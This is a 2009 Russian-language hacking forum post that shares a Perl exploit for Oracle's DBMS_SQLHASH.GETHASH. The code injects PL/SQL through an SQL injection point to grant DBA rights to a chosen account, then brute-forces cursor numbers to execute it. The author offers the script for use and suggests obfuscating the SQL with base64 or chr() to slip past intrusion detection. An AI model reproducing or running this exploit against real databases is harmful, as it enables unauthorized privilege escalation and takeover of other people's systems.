Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Oracle DBMS_SQLHASH.GETHASH exploit (perl) (https://forum.antichat.xyz/showthread.php?t=160977)

[ DSU ] 04.12.2009 03:00

Oracle DBMS_SQLHASH.GETHASH exploit (perl)
 
Написал простенький сплоит использующий уязвимость в DBMS_SQLHASH.GETHASH, сплоиту для работы требуется sql инъекция в pl/sql процедуре (обычно на Oracle Application server, там и принадлежат такие процедуры по дефолту пользователю которого нам достаточно). В принципе можно спросить зачем нам сплоит если есть инъекция? Я отвечу, что часто в таких процедурах идет простой sql select/update/insert, а в них мы можем только простой sql использовать. Данный сплоит позволяет выполнить pl/sql имея при этом только инъекцию в процедуре выполняющей скажем select и права только create_session.
Для того чтоб использовать данный сплоит и обойти IDS можно немного переписать sql и использовать utl_encode.base64_decode() или chr() выбирайте сами как вам больше нравится благо оракл предоставляет огромное количество процедур/функций для работы с текстом.

Сплоит работает по принципу:

1. Вставляет нужный нам код.

2. Брут номера курсора который бо дефолту идет =<300

Mirror: http://pastebin.org/58184
Код:

    #!/usr/bin/perl
    #Coded by dsu http://dsu.com.ua 2009
    #Vulnerability discovered by David Litchfield

    use LWP::UserAgent;
    $ua = new LWP::UserAgent;
    $ua->agent("MSIE 8" . $ua->agent);
    my $url = $ARGV[0];    #url of injectable param
    my $user = $ARGV[1];  # account to grant dba
    my $curs = 300; #maximal cursor number allowed by default
    my $sql="DDD''||DBMS_SQLHASH.GETHASH(''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''GRANT DBA TO ".$user."''''; COMMIT; END;'',1,1)||''DDDD";
    if (!$ARGV[0] or !$ARGV[0])
    {
        print "##########################################################################\r\n";
        print "#You need a create session privs and pl/sql procedure with sql-injection #\r\n";
        print "#Use: exp.pl http://example.org/e.cgi?param= scott                      #\r\n";
        print "##########################################################################\r\n";
    exit;
    }
    $ex = $url."exploit".$sql;
    print "Inject pl/sql \r\n";
    my $res1 = $ua->get($ex);
    print "Try to execute cursor it take several time\r\n";
    for( $i=1; $i < $curs; $i++ )
    {
                    my $res = $ua->get($url."tst''||(SELECT DBMS_SQL.EXECUTE(".$i.") FROM DUAL)||''tst");
    }
    print "executted";



Время: 21:56